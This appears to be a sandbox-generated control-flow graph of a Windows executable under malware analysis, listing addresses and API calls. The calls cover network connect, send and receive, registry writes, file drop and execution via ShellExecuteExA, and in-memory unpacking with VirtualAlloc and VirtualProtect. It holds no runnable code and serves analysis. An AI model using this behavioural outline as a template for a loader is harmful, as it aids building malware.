45074 41e1d3 45072->45074 45077 41e0c0 51 API calls 5 library calls 45073->45077 45074->44977 45076->44977 45077->45074 45241 402c50 45078->45241 45082 4034c0 45081->45082 45083 4034d9 45081->45083 45082->45083 45250 40e509 46 API calls 45082->45250 45085 401b52 45083->45085 45251 402d13 45085->45251 45087 401b68 45087->44988 45089 42635e __EH_prolog 45088->45089 45282 403e0c 45089->45282 45091 426382 45091->45091 45092 402c71 27 API calls 45091->45092 45093 4263e7 45092->45093 45296 404097 45093->45296 45095 426496 45099 4264b2 std::ios_base::_Ios_base_dtor 45095->45099 45313 40387f 26 API calls 2 library calls 45095->45313 45098 42646e 45102 402c50 27 API calls 45098->45102 45309 402bef 45099->45309 45100 402c71 27 API calls 45100->45098 45104 42648e 45102->45104 45106 402bef 26 API calls 45104->45106 45105 402bef 26 API calls 45107 424be8 45105->45107 45106->45095 45107->44992 45109 425eec __EH_prolog 45108->45109 45467 401bb2 45109->45467 45114 425f4b 45483 401a16 45114->45483 45115 425f2f 45504 401b6f 45115->45504 45118 425f58 45486 4024a1 45118->45486 45121 425f42 std::ios_base::_Ios_base_dtor 45121->44997 45125 425fa6 45126 401b6f 68 API calls 45125->45126 45126->45121 45128 4034ed __EH_prolog 45127->45128 45655 401056 45128->45655 45130 403513 45131 401056 50 API calls 45130->45131 45132 403542 45131->45132 45659 40399f 45132->45659 45134 403553 45134->45001 45136 42650e __EH_prolog 45135->45136 45137 401b1e 27 API calls 45136->45137 45138 4268d7 45137->45138 45697 401aa1 45138->45697 45140 4268ed 45141 401aa1 27 API calls 45140->45141 45142 426974 45141->45142 45143 401aa1 27 API calls 45142->45143 45144 426981 45143->45144 45145 401aa1 27 API calls 45144->45145 45146 4269e4 45145->45146 45147 401aa1 27 API calls 45146->45147 45148 4269f5 45147->45148 45149 401aa1 27 API calls 45148->45149 45150 426a02 45149->45150 45151 401aa1 27 API calls 45150->45151 45152 426aad 45151->45152 45153 401aa1 27 API calls 45152->45153 45154 426da4 45153->45154 45155 401aa1 
27 API calls 45154->45155 45156 427053 45155->45156 45157 401aa1 27 API calls 45156->45157 45183 427060 45157->45183 45158 42717c 45159 401aa1 27 API calls 45158->45159 45160 427189 WSAStartup 45159->45160 45161 4271a3 socket 45160->45161 45184 4273da 45160->45184 45162 4271d0 45161->45162 45163 4271bb 45161->45163 45165 4271d8 gethostbyname 45162->45165 45164 4271c4 WSACleanup 45163->45164 45166 42758b 45164->45166 45167 4271e9 _Yarn 45165->45167 45165->45184 45166->45003 45169 4271fc htons connect 45167->45169 45168 42757e WSACleanup closesocket 45168->45166 45170 42722b 45169->45170 45169->45184 45171 42723d send 45170->45171 45172 42724d 45171->45172 45171->45184 45173 427253 send 45172->45173 45179 427269 ___scrt_fastfail 45172->45179 45173->45179 45173->45184 45174 42728f recv 45174->45179 45174->45184 45175 412faf 46 API calls 45175->45179 45176 4273cd 45177 4273d4 45176->45177 45178 427515 45176->45178 45195 4273e9 45176->45195 45177->45184 45177->45195 45180 427535 recv 45178->45180 45178->45184 45179->45174 45179->45175 45179->45176 45179->45184 45702 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45179->45702 45180->45178 45180->45184 45181 42740d recv 45181->45184 45181->45195 45183->45158 45185 401aa1 27 API calls 45183->45185 45184->45168 45187 42714c 45185->45187 45186 427508 45186->45184 45701 403ae1 27 API calls 45187->45701 45190 427157 SetThreadLocale 45191 42716f 45190->45191 45192 401aa1 27 API calls 45191->45192 45192->45158 45194 4274aa recv 45194->45184 45194->45195 45195->45181 45195->45184 45195->45186 45195->45194 45196 4274d5 recv 45195->45196 45703 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 45195->45703 45704 42611d 22 API calls 45195->45704 45196->45184 45196->45195 45710 4275a4 45197->45710 45199 426139 RegCreateKeyExA 45200 4261f7 45199->45200 45203 42616c 45199->45203 45201 426206 45200->45201 45202 4261fd RegCloseKey 45200->45202 45201->45005 45202->45201 45204 402c71 27 API calls 45203->45204 45205 426195 45204->45205 
45206 402c71 27 API calls 45205->45206 45207 4261be RegSetValueExA 45206->45207 45208 402bef 26 API calls 45207->45208 45209 4261ef 45208->45209 45210 402bef 26 API calls 45209->45210 45210->45200 45212 403579 __EH_prolog 45211->45212 45213 401056 50 API calls 45212->45213 45214 40359c 45213->45214 45215 401056 50 API calls 45214->45215 45216 4035c8 45215->45216 45217 40399f 27 API calls 45216->45217 45218 4035d9 45217->45218 45218->45009 45220 410cb2 45219->45220 45221 410c9d 45219->45221 45713 41097b 51 API calls 4 library calls 45220->45713 45711 412381 20 API calls __Strcoll 45221->45711 45224 410cad 45224->45020 45225 410ca2 45712 410905 26 API calls _Deallocate 45225->45712 45228 42588e 45227->45228 45229 42623e WriteFile FindCloseChangeNotification 45227->45229 45228->45024 45228->45028 45229->45228 45231 426271 45230->45231 45231->45231 45232 426279 ShellExecuteExA 45231->45232 45233 4262c5 45232->45233 45234 4262ae WaitForSingleObject CloseHandle 45232->45234 45235 402bef 26 API calls 45233->45235 45234->45233 45236 4262cd 45235->45236 45236->45028 45238 426331 45237->45238 45238->45032 45238->45238 45242 402c5a 45241->45242 45245 402c71 45242->45245 45244 401b3a 45244->44983 45246 402ca4 45245->45246 45248 402c80 BuildCatchObjectHelperInternal 45245->45248 45249 40373e 27 API calls 2 library calls 45246->45249 45248->45244 45249->45248 45250->45082 45252 402d2a 45251->45252 45254 402d31 _Yarn 45252->45254 45255 403859 45252->45255 45254->45087 45256 403866 45255->45256 45257 40386f 45255->45257 45262 4039ce 45256->45262 45259 40387b 45257->45259 45271 409256 45257->45271 45259->45254 45260 40386c 45260->45254 45263 409256 std::_Facet_Register 8 API calls 45262->45263 45264 4039e5 45263->45264 45265 4039f7 45264->45265 45266 4039ec 45264->45266 45278 41088a 26 API calls 3 library calls 45265->45278 45266->45260 45268 410924 45279 410932 11 API calls _abort 45268->45279 45270 410931 45273 40925b ___crtLCMapStringA 45271->45273 45272 409275 45272->45260 
45273->45272 45275 409277 std::_Facet_Register 45273->45275 45280 412ede 7 API calls 2 library calls 45273->45280 45281 40aa2b RaiseException 45275->45281 45277 40996c 45278->45268 45279->45270 45280->45273 45281->45277 45283 403e16 __EH_prolog 45282->45283 45314 407d73 45283->45314 45285 403e38 45324 404189 45285->45324 45291 403e7f 45362 4044e5 45291->45362 45293 403e8b 45383 4043fe 45293->45383 45297 4040a1 __EH_prolog 45296->45297 45304 4040b2 45297->45304 45460 40429b 27 API calls __EH_prolog 45297->45460 45299 4040d9 45461 404777 27 API calls 45299->45461 45301 404152 45465 404238 26 API calls _Deallocate 45301->45465 45304->45095 45304->45098 45304->45100 45305 404144 45464 404777 27 API calls 45305->45464 45306 4040e9 45306->45301 45306->45305 45462 404777 27 API calls 45306->45462 45463 404579 26 API calls 45306->45463 45310 402c03 45309->45310 45311 402bfa 45309->45311 45310->45105 45466 40387f 26 API calls 2 library calls 45311->45466 45313->45099 45315 407d7f __EH_prolog3 45314->45315 45387 407b1c 45315->45387 45320 407d9d 45401 407f02 40 API calls _Atexit 45320->45401 45321 407dfb std::locale::_Init 45321->45285 45323 407da5 _Yarn 45393 407b74 45323->45393 45325 404193 __EH_prolog 45324->45325 45326 407b1c std::_Lockit::_Lockit 2 API calls 45325->45326 45327 4041a2 45326->45327 45406 401318 45327->45406 45329 4041b9 std::locale::_Getfacet 45337 4041cc 45329->45337 45412 40436e 45329->45412 45330 407b74 std::_Lockit::~_Lockit 2 API calls 45331 403e49 45330->45331 45340 4033ea 45331->45340 45334 4041e3 45426 407d41 8 API calls std::_Facet_Register 45334->45426 45335 404219 45427 40aa2b RaiseException 45335->45427 45337->45330 45339 40422f 45341 4033f4 __EH_prolog 45340->45341 45342 407b1c std::_Lockit::_Lockit 2 API calls 45341->45342 45343 403403 45342->45343 45344 401318 int 4 API calls 45343->45344 45346 40341a std::locale::_Getfacet 45344->45346 45345 40342d 45347 407b74 std::_Lockit::~_Lockit 2 API calls 45345->45347 45346->45345 45439 401429 76 API 
calls 2 library calls 45346->45439 45349 40346a 45347->45349 45356 404424 45349->45356 45350 40343d 45351 403444 45350->45351 45352 40347a 45350->45352 45440 407d41 8 API calls std::_Facet_Register 45351->45440 45441 40aa2b RaiseException 45352->45441 45355 403490 45357 40442e __EH_prolog 45356->45357 45442 404d6b 45357->45442 45359 404463 45360 409256 std::_Facet_Register 8 API calls 45359->45360 45361 40447e 45360->45361 45361->45291 45363 4044ef __EH_prolog 45362->45363 45454 405177 8 API calls std::_Facet_Register 45363->45454 45365 40450d 45455 405025 29 API calls std::_Facet_Register 45365->45455 45367 404517 45368 404571 45367->45368 45369 40451e 45367->45369 45458 404efe 27 API calls 45368->45458 45456 405119 8 API calls std::_Facet_Register 45369->45456 45372 404528 45457 405e85 8 API calls std::_Facet_Register 45372->45457 45375 404531 45375->45293 45384 404406 45383->45384 45386 403eb8 45383->45386 45459 40387f 26 API calls 2 library calls 45384->45459 45386->45091 45388 407b32 45387->45388 45389 407b2b 45387->45389 45391 407b30 45388->45391 45403 408745 EnterCriticalSection 45388->45403 45402 411a65 EnterCriticalSection _abort 45389->45402 45391->45323 45400 407edf 8 API calls 2 library calls 45391->45400 45394 407b7e 45393->45394 45395 411a6e 45393->45395 45399 407b91 45394->45399 45404 408753 LeaveCriticalSection 45394->45404 45405 411a4e LeaveCriticalSection 45395->45405 45397 411a75 45397->45321 45399->45321 45400->45320 45401->45323 45402->45391 45403->45391 45404->45399 45405->45397 45407 401324 45406->45407 45408 401348 45406->45408 45409 407b1c std::_Lockit::_Lockit 2 API calls 45407->45409 45408->45329 45410 40132e 45409->45410 45411 407b74 std::_Lockit::~_Lockit 2 API calls 45410->45411 45411->45408 45414 404378 __EH_prolog 45412->45414 45413 4041dc 45413->45334 45413->45335 45414->45413 45415 409256 std::_Facet_Register 8 API calls 45414->45415 45416 404395 45415->45416 45428 403a42 45416->45428 45420 4043c6 45437 40866c 38 API calls 
__Getcoll 45420->45437 45422 4043d4 45438 401239 74 API calls 2 library calls 45422->45438 45424 4043e4 45425 402bef 26 API calls 45424->45425 45425->45413 45426->45337 45427->45339 45429 403a4c __EH_prolog 45428->45429 45430 403a5d 45429->45430 45431 402c71 27 API calls 45429->45431 45432 403ac1 45430->45432 45433 402bef 26 API calls 45430->45433 45431->45430 45434 403ace 45432->45434 45435 402bef 26 API calls 45432->45435 45433->45432 45436 4011b0 76 API calls 7 library calls 45434->45436 45435->45434 45436->45420 45437->45422 45438->45424 45439->45350 45440->45345 45441->45355 45445 404eb6 45442->45445 45444 404d85 45444->45359 45444->45444 45446 404ed2 45445->45446 45452 404ece 45445->45452 45447 404ef8 45446->45447 45448 404eda 45446->45448 45453 4030f6 27 API calls 45447->45453 45450 403859 27 API calls 45448->45450 45450->45452 45452->45444 45454->45365 45455->45367 45456->45372 45457->45375 45459->45386 45460->45299 45461->45306 45462->45306 45463->45306 45464->45301 45466->45310 45468 401bbc __EH_prolog 45467->45468 45508 40307c 45468->45508 45474 401c1f 45475 401c51 45474->45475 45526 40187f 42 API calls 2 library calls 45474->45526 45477 402403 45475->45477 45478 40240d __EH_prolog 45477->45478 45544 402b06 45478->45544 45481 402441 45481->45114 45481->45115 45590 402baa 45483->45590 45485 401a30 ___scrt_fastfail 45485->45118 45487 4024ab __EH_prolog 45486->45487 45488 4024e4 45487->45488 45599 40187f 42 API calls 2 library calls 45487->45599 45489 402b06 42 API calls 45488->45489 45491 4024ee 45489->45491 45492 402551 45491->45492 45495 401d87 65 API calls 45491->45495 45496 40257c 45492->45496 45493 402511 45493->45492 45600 40187f 42 API calls 2 library calls 45493->45600 45495->45493 45497 402586 __EH_prolog 45496->45497 45498 402b06 42 API calls 45497->45498 45502 4025a8 45498->45502 45499 4025d8 45500 40265a 45499->45500 45605 40187f 42 API calls 2 library calls 45499->45605 45507 402b87 26 API calls _Deallocate 45500->45507 45502->45499 45601 
401f2b 45502->45601 45643 4023b6 45504->45643 45506 401b95 45506->45121 45507->45125 45509 403086 __EH_prolog 45508->45509 45527 403175 45509->45527 45512 402fe5 45513 402fef __EH_prolog 45512->45513 45514 409256 std::_Facet_Register 8 API calls 45513->45514 45515 403005 45514->45515 45516 407d73 std::locale::_Init 43 API calls 45515->45516 45517 403013 45516->45517 45538 402e7b 45517->45538 45520 402f6b 45521 402f75 __EH_prolog 45520->45521 45522 402e7b 26 API calls 45521->45522 45525 402fbf std::ios_base::_Ios_base_dtor 45521->45525 45523 402f9d 45522->45523 45543 4035f5 76 API calls 7 library calls 45523->45543 45525->45474 45526->45475 45528 40317f __EH_prolog 45527->45528 45529 409256 std::_Facet_Register 8 API calls 45528->45529 45530 4031b9 45529->45530 45531 407d73 std::locale::_Init 43 API calls 45530->45531 45532 4031c6 45531->45532 45533 4033ea 76 API calls 45532->45533 45534 4031f5 std::ios_base::_Ios_base_dtor 45533->45534 45535 401bec 45534->45535 45537 40187f 42 API calls 2 library calls 45534->45537 45535->45512 45537->45535 45539 401c0f 45538->45539 45540 402ed9 45538->45540 45539->45520 45542 40e7d7 26 API calls 2 library calls 45540->45542 45542->45539 45543->45525 45545 402b10 __EH_prolog 45544->45545 45556 403101 45545->45556 45548 401d87 45549 401d99 45548->45549 45555 401df4 45549->45555 45564 402dfd 45549->45564 45552 401de1 45552->45555 45573 40fd67 45552->45573 45555->45481 45558 40310b __EH_prolog 45556->45558 45557 403128 45559 40241d 45557->45559 45563 40187f 42 API calls 2 library calls 45557->45563 45558->45557 45562 403242 42 API calls __EH_prolog 45558->45562 45559->45481 45559->45548 45562->45557 45563->45559 45565 402e0d 45564->45565 45567 401dc4 45564->45567 45565->45567 45584 4022ae 65 API calls 45565->45584 45567->45552 45567->45555 45570 4106d4 45567->45570 45568 402e1a 45568->45567 45585 40ea7d 65 API calls 2 library calls 45568->45585 45571 41049b _Xfiopen 64 API calls 45570->45571 45572 4106ea 45571->45572 45572->45552 
45574 40fd72 45573->45574 45575 40fd87 45573->45575 45586 412381 20 API calls __Strcoll 45574->45586 45583 40fd9f 45575->45583 45588 412381 20 API calls __Strcoll 45575->45588 45577 40fd77 45587 410905 26 API calls _Deallocate 45577->45587 45580 40fd94 45589 410905 26 API calls _Deallocate 45580->45589 45581 40fd82 45581->45555 45583->45555 45584->45568 45585->45567 45586->45577 45587->45581 45588->45580 45589->45583 45591 402bc6 45590->45591 45596 402bc2 45590->45596 45592 402be9 45591->45592 45593 402bce 45591->45593 45598 4030f6 27 API calls 45592->45598 45594 403859 27 API calls 45593->45594 45594->45596 45596->45485 45599->45488 45600->45492 45602 401f3f 45601->45602 45603 401f52 _Yarn 45601->45603 45602->45499 45603->45602 45606 4102e9 45603->45606 45605->45500 45609 410306 45606->45609 45608 410301 45608->45602 45610 410312 __FrameHandler3::FrameUnwindToState 45609->45610 45611 410352 45610->45611 45612 41034a __fread_nolock 45610->45612 45617 410325 ___scrt_fastfail 45610->45617 45622 40e81d EnterCriticalSection 45611->45622 45612->45608 45614 41035c 45623 41011d 45614->45623 45636 412381 20 API calls __Strcoll 45617->45636 45618 41033f 45637 410905 26 API calls _Deallocate 45618->45637 45622->45614 45625 41012f ___scrt_fastfail 45623->45625 45629 41014c 45623->45629 45624 41013c 45639 412381 20 API calls __Strcoll 45624->45639 45625->45624 45625->45629 45632 41018f __fread_nolock 45625->45632 45627 410141 45640 410905 26 API calls _Deallocate 45627->45640 45638 410391 LeaveCriticalSection _Xfiopen 45629->45638 45630 4102ab ___scrt_fastfail 45642 412381 20 API calls __Strcoll 45630->45642 45632->45629 45632->45630 45634 4154e8 _Xfiopen 26 API calls 45632->45634 45635 4192ad __fread_nolock 38 API calls 45632->45635 45641 410399 26 API calls 4 library calls 45632->45641 45634->45632 45635->45632 45636->45618 45637->45612 45638->45612 45639->45627 45640->45629 45641->45632 45642->45627 45644 4023dd 45643->45644 45645 4023ef 45644->45645 45647 402f2f 
45644->45647 45645->45506 45648 402f3d 45647->45648 45654 402f39 45647->45654 45649 402dfd 65 API calls 45648->45649 45651 402f42 45649->45651 45650 402e7b 26 API calls 45653 402f66 45650->45653 45652 40e228 _Xfiopen 67 API calls 45651->45652 45652->45654 45653->45645 45654->45650 45656 40106d ___scrt_initialize_default_local_stdio_options 45655->45656 45663 40fd43 45656->45663 45660 4039c7 45659->45660 45661 4039bb 45659->45661 45660->45134 45662 402c71 27 API calls 45661->45662 45662->45660 45666 40ead5 45663->45666 45667 40eb15 45666->45667 45668 40eafd 45666->45668 45667->45668 45670 40eb1d 45667->45670 45690 412381 20 API calls __Strcoll 45668->45690 45692 40e3f2 38 API calls 3 library calls 45670->45692 45672 40eb02 45691 410905 26 API calls _Deallocate 45672->45691 45673 40eb2d 45693 40eef9 20 API calls __Strcoll 45673->45693 45675 40eb0d 45683 4097a5 45675->45683 45678 40eba5 45694 40f0ad 50 API calls 3 library calls 45678->45694 45679 40107b 45679->45130 45682 40ebb0 45695 40ef2e 20 API calls _free 45682->45695 45684 4097b0 IsProcessorFeaturePresent 45683->45684 45685 4097ae 45683->45685 45687 409efa 45684->45687 45685->45679 45696 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 45687->45696 45689 409fdd 45689->45679 45690->45672 45691->45675 45692->45673 45693->45678 45694->45682 45695->45675 45696->45689 45698 401aab 45697->45698 45698->45698 45705 402cba 45698->45705 45700 401abd 45700->45140 45701->45190 45702->45179 45703->45195 45704->45195 45706 402cfa 45705->45706 45708 402cd0 BuildCatchObjectHelperInternal 45705->45708 45709 4037a9 27 API calls 2 library calls 45706->45709 45708->45700 45709->45708 45710->45199 45711->45225 45712->45224 45713->45224 45715 4138da _abort 45714->45715 45716 4138e1 45715->45716 45717 4138f3 45715->45717 45753 413a28 GetModuleHandleW 45716->45753 45738 411a06 EnterCriticalSection 45717->45738 45720 4138e6 45720->45717 45754 413a6c GetModuleHandleExW 45720->45754 45723 
41396f 45729 413987 45723->45729 45733 41381a _abort 5 API calls 45723->45733 45724 4138fa 45724->45723 45737 413998 45724->45737 45739 4151ba 45724->45739 45727 4139e1 45762 424699 5 API calls ___crtLCMapStringA 45727->45762 45728 4139b5 45745 4139e7 45728->45745 45734 41381a _abort 5 API calls 45729->45734 45733->45729 45734->45737 45742 4139d8 45737->45742 45738->45724 45763 414ef3 45739->45763 45782 411a4e LeaveCriticalSection 45742->45782 45744 4139b1 45744->45727 45744->45728 45783 4177fa 45745->45783 45748 413a15 45750 413a6c _abort 8 API calls 45748->45750 45749 4139f5 GetPEB 45749->45748 45751 413a05 GetCurrentProcess TerminateProcess 45749->45751 45752 413a1d ExitProcess 45750->45752 45751->45748 45753->45720 45755 413a96 GetProcAddress 45754->45755 45756 413ab9 45754->45756 45757 413aab 45755->45757 45758 413ac8 45756->45758 45759 413abf FreeLibrary 45756->45759 45757->45756 45760 4097a5 ___crtLCMapStringA 5 API calls 45758->45760 45759->45758 45761 4138f2 45760->45761 45761->45717 45766 414ea2 45763->45766 45765 414f17 45765->45723 45767 414eae __FrameHandler3::FrameUnwindToState 45766->45767 45774 411a06 EnterCriticalSection 45767->45774 45769 414ebc 45775 414f43 45769->45775 45773 414eda __fread_nolock 45773->45765 45774->45769 45776 414f63 45775->45776 45780 414f6b 45775->45780 45777 4097a5 ___crtLCMapStringA 5 API calls 45776->45777 45778 414ec9 45777->45778 45781 414ee7 LeaveCriticalSection std::_Lockit::~_Lockit 45778->45781 45779 41629a _free 20 API calls 45779->45776 45780->45776 45780->45779 45781->45773 45782->45744 45784 417815 45783->45784 45785 41781f 45783->45785 45787 4097a5 ___crtLCMapStringA 5 API calls 45784->45787 45790 4171b7 5 API calls 2 library calls 45785->45790 45788 4139f1 45787->45788 45788->45748 45788->45749 45789 417836 45789->45784 45790->45789 45791 41aff9 45796 41adc7 45791->45796 45794 41b021 45801 41adf2 45796->45801 45798 41afe5 45815 410905 26 API calls _Deallocate 45798->45815 45800 41af44 45800->45794 45808 41a34b 
45800->45808 45807 41af3b 45801->45807 45811 422ce9 46 API calls 2 library calls 45801->45811 45803 41af85 45803->45807 45812 422ce9 46 API calls 2 library calls 45803->45812 45805 41afa4 45805->45807 45813 422ce9 46 API calls 2 library calls 45805->45813 45807->45800 45814 412381 20 API calls __Strcoll 45807->45814 45816 419d20 45808->45816 45810 41a366 45810->45794 45811->45803 45812->45805 45813->45807 45814->45798 45815->45800 45819 419d2c __FrameHandler3::FrameUnwindToState 45816->45819 45817 419d3a 45834 412381 20 API calls __Strcoll 45817->45834 45819->45817 45821 419d73 45819->45821 45820 419d3f 45835 410905 26 API calls _Deallocate 45820->45835 45827 41a2fa 45821->45827 45826 419d49 __fread_nolock 45826->45810 45837 4228d8 45827->45837 45832 41629a _free 20 API calls 45833 419d97 45832->45833 45836 419dc0 LeaveCriticalSection __wsopen_s 45833->45836 45834->45820 45835->45826 45836->45826 45838 4228e4 45837->45838 45839 4228fb 45837->45839 45908 412381 20 API calls __Strcoll 45838->45908 45840 422903 45839->45840 45841 42291a 45839->45841 45910 412381 20 API calls __Strcoll 45840->45910 45912 4172ce 10 API calls 2 library calls 45841->45912 45843 4228e9 45909 410905 26 API calls _Deallocate 45843->45909 45847 422908 45911 410905 26 API calls _Deallocate 45847->45911 45848 422921 MultiByteToWideChar 45850 422950 45848->45850 45851 422940 GetLastError 45848->45851 45852 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 45850->45852 45913 41234b 20 API calls 3 library calls 45851->45913 45855 422958 45852->45855 45853 41a310 45853->45833 45861 41a36b 45853->45861 45856 422980 45855->45856 45857 42295f MultiByteToWideChar 45855->45857 45859 41629a _free 20 API calls 45856->45859 45857->45856 45858 422974 GetLastError 45857->45858 45914 41234b 20 API calls 3 library calls 45858->45914 45859->45853 45915 41a0ce 45861->45915 45864 41a3b6 45933 41e7d7 45864->45933 45865 41a39d 45947 41236e 20 API calls __Strcoll 45865->45947 45868 41a3bb 45870 41a3c4 45868->45870 
45871 41a3db 45868->45871 45869 41a3a2 45948 412381 20 API calls __Strcoll 45869->45948 45949 41236e 20 API calls __Strcoll 45870->45949 45946 41a039 CreateFileW 45871->45946 45875 41a3c9 45950 412381 20 API calls __Strcoll 45875->45950 45876 41a338 45876->45832 45878 41a491 GetFileType 45879 41a4e3 45878->45879 45880 41a49c GetLastError 45878->45880 45955 41e720 21 API calls 3 library calls 45879->45955 45953 41234b 20 API calls 3 library calls 45880->45953 45881 41a466 GetLastError 45952 41234b 20 API calls 3 library calls 45881->45952 45884 41a414 45884->45878 45884->45881 45951 41a039 CreateFileW 45884->45951 45885 41a4aa CloseHandle 45885->45869 45887 41a4d3 45885->45887 45954 412381 20 API calls __Strcoll 45887->45954 45889 41a459 45889->45878 45889->45881 45891 41a504 45892 41a550 45891->45892 45956 41a24a 72 API calls 4 library calls 45891->45956 45897 41a57d 45892->45897 45957 419dec 72 API calls 5 library calls 45892->45957 45893 41a4d8 45893->45869 45896 41a576 45896->45897 45898 41a58e 45896->45898 45899 4163fd __wsopen_s 29 API calls 45897->45899 45898->45876 45900 41a60c CloseHandle 45898->45900 45899->45876 45958 41a039 CreateFileW 45900->45958 45902 41a637 45903 41a641 GetLastError 45902->45903 45907 41a66d 45902->45907 45959 41234b 20 API calls 3 library calls 45903->45959 45905 41a64d 45960 41e8e9 21 API calls 3 library calls 45905->45960 45907->45876 45908->45843 45909->45853 45910->45847 45911->45853 45912->45848 45913->45853 45914->45856 45916 41a109 45915->45916 45917 41a0ef 45915->45917 45961 41a05e 45916->45961 45917->45916 45968 412381 20 API calls __Strcoll 45917->45968 45920 41a141 45930 41a170 45920->45930 45970 412381 20 API calls __Strcoll 45920->45970 45921 41a0fe 45969 410905 26 API calls _Deallocate 45921->45969 45925 41a1be 45927 41a23d 45925->45927 45931 41a1c3 45925->45931 45926 41a165 45971 410905 26 API calls _Deallocate 45926->45971 45973 410932 11 API calls _abort 45927->45973 45930->45931 45972 413b67 26 API calls 2 library 
calls 45930->45972 45931->45864 45931->45865 45932 41a249 45934 41e7e3 __FrameHandler3::FrameUnwindToState 45933->45934 45976 411a06 EnterCriticalSection 45934->45976 45936 41e80f 45980 41e5b6 21 API calls 2 library calls 45936->45980 45939 41e85a __fread_nolock 45939->45868 45940 41e7ea 45940->45936 45942 41e87d EnterCriticalSection 45940->45942 45943 41e831 45940->45943 45941 41e814 45941->45943 45981 41e6fd EnterCriticalSection 45941->45981 45942->45943 45944 41e88a LeaveCriticalSection 45942->45944 45977 41e8e0 45943->45977 45944->45940 45946->45884 45947->45869 45948->45876 45949->45875 45950->45869 45951->45889 45952->45869 45953->45885 45954->45893 45955->45891 45956->45892 45957->45896 45958->45902 45959->45905 45960->45907 45963 41a076 45961->45963 45962 41a091 45962->45920 45963->45962 45974 412381 20 API calls __Strcoll 45963->45974 45965 41a0b5 45975 410905 26 API calls _Deallocate 45965->45975 45967 41a0c0 45967->45920 45968->45921 45969->45916 45970->45926 45971->45930 45972->45925 45973->45932 45974->45965 45975->45967 45976->45940 45982 411a4e LeaveCriticalSection 45977->45982 45979 41e8e7 45979->45939 45980->45941 45981->45943 45982->45979 45983 40e78b 45993 40e078 45983->45993 45987 40e798 45988 4165f6 _Xfiopen 20 API calls 45987->45988 45989 40e7a7 DeleteCriticalSection 45988->45989 45989->45987 45990 40e7c2 45989->45990 45991 41629a _free 20 API calls 45990->45991 45992 40e7cd 45991->45992 46006 40e081 45993->46006 45995 40e07f 45996 4178b7 45995->45996 45997 4178c3 __FrameHandler3::FrameUnwindToState 45996->45997 46023 411a06 EnterCriticalSection 45997->46023 45999 417939 46024 41794e 45999->46024 46001 4178ce 46001->45999 46003 41790d DeleteCriticalSection 46001->46003 46005 40e228 _Xfiopen 67 API calls 46001->46005 46002 417945 __fread_nolock 46002->45987 46004 41629a _free 20 API calls 46003->46004 46004->46001 46005->46001 46007 40e08d __FrameHandler3::FrameUnwindToState 46006->46007 46016 411a06 EnterCriticalSection 46007->46016 46009 
40e130 46017 40e150 46009->46017 46012 40e13c __fread_nolock 46012->45995 46014 40e09c 46014->46009 46015 40e031 66 API calls 46014->46015 46020 40e81d EnterCriticalSection 46014->46020 46021 40e126 LeaveCriticalSection _Xfiopen 46014->46021 46015->46014 46016->46014 46022 411a4e LeaveCriticalSection 46017->46022 46019 40e157 46019->46012 46020->46014 46021->46014 46022->46019 46023->46001 46027 411a4e LeaveCriticalSection 46024->46027 46026 417955 46026->46002 46027->46026 46028 420003c 46029 4200049 46028->46029 46043 4200e0f SetErrorMode SetErrorMode 46029->46043 46034 4200265 46035 42002ce VirtualProtect 46034->46035 46037 420030b 46035->46037 46036 4200439 VirtualFree 46041 42005f4 LoadLibraryA 46036->46041 46042 42004be 46036->46042 46037->46036 46038 42004e3 LoadLibraryA 46038->46042 46040 42008c7 46041->46040 46042->46038 46042->46041 46044 4200223 46043->46044 46045 4200d90 46044->46045 46046 4200dad 46045->46046 46047 4200dbb GetPEB 46046->46047 46048 4200238 VirtualAlloc 46046->46048 46047->46048 46048->46034 46049 41870f 46050 41871b __FrameHandler3::FrameUnwindToState 46049->46050 46051 418727 46050->46051 46052 41873e 46050->46052 46083 412381 20 API calls __Strcoll 46051->46083 46062 40e81d EnterCriticalSection 46052->46062 46055 41874e 46063 41878b 46055->46063 46056 41872c 46084 410905 26 API calls _Deallocate 46056->46084 46059 41875a 46085 418781 LeaveCriticalSection _Xfiopen 46059->46085 46060 418737 __fread_nolock 46062->46055 46064 4187b3 46063->46064 46065 418799 46063->46065 46067 4154e8 _Xfiopen 26 API calls 46064->46067 46089 412381 20 API calls __Strcoll 46065->46089 46069 4187bc 46067->46069 46068 41879e 46090 410905 26 API calls _Deallocate 46068->46090 46086 4197e5 46069->46086 46073 4188c0 46075 4188cd 46073->46075 46082 418873 46073->46082 46074 418844 46077 418861 46074->46077 46074->46082 46092 412381 20 API calls __Strcoll 46075->46092 46091 418aa4 31 API calls 3 library calls 46077->46091 46079 41886b 46080 4187a9 
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46079->46080 46080->46059 46082->46080 46093 418920 30 API calls 2 library calls 46082->46093 46083->46056 46084->46060 46085->46060 46094 419662 46086->46094 46088 4187d8 46088->46073 46088->46074 46088->46080 46089->46068 46090->46080 46091->46079 46092->46080 46093->46080 46095 41966e __FrameHandler3::FrameUnwindToState 46094->46095 46096 419676 46095->46096 46097 41968e 46095->46097 46120 41236e 20 API calls __Strcoll 46096->46120 46098 419742 46097->46098 46104 4196c6 46097->46104 46125 41236e 20 API calls __Strcoll 46098->46125 46100 41967b 46121 412381 20 API calls __Strcoll 46100->46121 46103 419747 46126 412381 20 API calls __Strcoll 46103->46126 46119 41e6fd EnterCriticalSection 46104->46119 46105 419683 __fread_nolock 46105->46088 46108 41974f 46127 410905 26 API calls _Deallocate 46108->46127 46109 4196cc 46111 4196f0 46109->46111 46112 419705 46109->46112 46122 412381 20 API calls __Strcoll 46111->46122 46114 419767 __fread_nolock 28 API calls 46112->46114 46115 419700 46114->46115 46124 41973a LeaveCriticalSection __wsopen_s 46115->46124 46116 4196f5 46123 41236e 20 API calls __Strcoll 46116->46123 46119->46109 46120->46100 46121->46105 46122->46116 46123->46115 46124->46105 46125->46103 46126->46108 46127->46105

Control-flow Graph

• Executed
• Not Executed
